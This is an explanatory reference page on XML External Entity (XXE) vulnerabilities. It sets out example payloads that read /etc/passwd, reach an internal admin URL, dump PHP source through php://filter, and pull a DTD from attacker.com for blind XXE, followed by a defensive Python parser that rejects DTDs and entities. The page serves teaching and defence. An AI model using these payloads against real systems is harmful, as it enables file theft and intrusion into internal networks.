XML External Entity (XXE)

XML External Entity (XXE) is a vulnerability in applications whose XML parser processes the DTD and resolves external entities. An attacker who controls the XML input can declare external entities that read local files, reach internal services (server-side request forgery), or exhaust resources (denial of service) when the document is parsed.

How It Works

XML allows defining entities in the Document Type Definition (DTD). External entities can reference local files or remote URLs. When a vulnerable XML parser processes the document, it resolves these entities, potentially exposing sensitive data.

Basic XXE Payload

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

Attack Variants

<!-- File disclosure -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">

<!-- SSRF -->
<!ENTITY xxe SYSTEM "http://internal-server/admin">

<!-- Read PHP source via wrapper -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">

<!-- Parameter entity for blind XXE -->
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
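The defensive counterpart to the mechanism described under How It Works and to the variants listed above, as an added example that is not part of the original page: a hardened parser built on Python's standard-library expat bindings that refuses DOCTYPE declarations, general and parameter entity declarations, and external entity resolution (the same approach the defusedxml library takes), exercised against constructed copies of the payloads above. The function names, the allow_dtd flag and the sample documents are assumptions of this example.

```python
"""Hardened XML parsing for untrusted input, using only the stdlib expat bindings.

Added illustration, not code from the original page. Every construct XXE relies
on lives in the DTD, so the parser refuses the DTD instead of trying to resolve
it safely.
"""
import xml.parsers.expat as expat


class UnsafeXMLError(ValueError):
    """Raised when an untrusted document contains constructs that enable XXE."""


def parse_untrusted_xml(data: bytes, allow_dtd: bool = False) -> dict:
    """Parse data and return a plain dict tree, aborting on any XXE primitive.

    allow_dtd=False (default) rejects every DOCTYPE. Some formats (SVG, DOCX
    parts) legitimately carry one; with allow_dtd=True the DOCTYPE itself is
    accepted but entity declarations and external references are still refused.
    """
    parser = expat.ParserCreate()
    # Never fetch the external DTD subset or external parameter entities
    # (blocks the blind-XXE pattern <!ENTITY % xxe SYSTEM "http://..."> %xxe;).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    root = {"tag": None, "attrs": {}, "text": "", "children": []}
    stack = [root]

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if not allow_dtd:
            raise UnsafeXMLError(f"DOCTYPE {name!r} not allowed in untrusted XML")

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Covers file:// and http:// SYSTEM entities, php://filter, parameter
        # entities, and the internal entities used by billion-laughs documents.
        kind = "parameter" if is_parameter else "general"
        source = f"external SYSTEM {system_id!r}" if system_id else "internal"
        raise UnsafeXMLError(f"{kind} entity {name!r} ({source}) not allowed")

    def on_external_entity_ref(context, base, system_id, public_id):
        # Belt and braces: if a reference is ever reached, refuse to fetch it.
        raise UnsafeXMLError(f"refusing to resolve external entity {system_id!r}")

    def on_start(tag, attrs):
        node = {"tag": tag, "attrs": attrs, "text": "", "children": []}
        stack[-1]["children"].append(node)
        stack.append(node)

    def on_end(tag):
        stack.pop()

    def on_text(text):
        stack[-1]["text"] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_entity_ref
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text

    parser.Parse(data, True)  # exceptions raised inside handlers propagate here
    return root["children"][0]


def is_safe_xml(data: bytes, allow_dtd: bool = False) -> bool:
    """Convenience check for a validation layer: True if the document parsed cleanly."""
    try:
        parse_untrusted_xml(data, allow_dtd=allow_dtd)
    except UnsafeXMLError:
        return False
    return True


# Constructed sample documents mirroring the page's payloads (assumptions of this example).
BENIGN = b'<?xml version="1.0"?><root><data id="1">hello</data></root>'
BASIC_XXE = (b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
             b'<root><data>&xxe;</data></root>')
BLIND_XXE = (b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://example.invalid/evil.dtd">%xxe;]>'
             b'<root/>')
LAUGHS = (b'<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;">]>'
          b'<lolz>&lol2;</lolz>')
PLAIN_DOCTYPE = b'<!DOCTYPE svg><svg/>'

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("basic", BASIC_XXE), ("blind", BLIND_XXE),
                       ("laughs", LAUGHS), ("doctype", PLAIN_DOCTYPE)]:
        print(f"{label:8s} strict={is_safe_xml(doc)}  allow_dtd={is_safe_xml(doc, allow_dtd=True)}")
```

The same policy expressed for lxml is XMLParser(resolve_entities=False, no_network=True, load_dtd=False); for .NET, Java and other stacks the equivalent is to disable DTD processing entirely, which is the OWASP-recommended default.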

Impact

  • Read local files (configuration, credentials, source code)
  • Server-Side Request Forgery (access internal services)
  • Denial of Service (billion laughs attack)
  • Port scanning of internal network

Vulnerable Contexts

  • SOAP web services
  • XML file uploads
  • SVG image processing
  • Office document parsing (DOCX, XLSX)
  • RSS/Atom feed parsers

See Also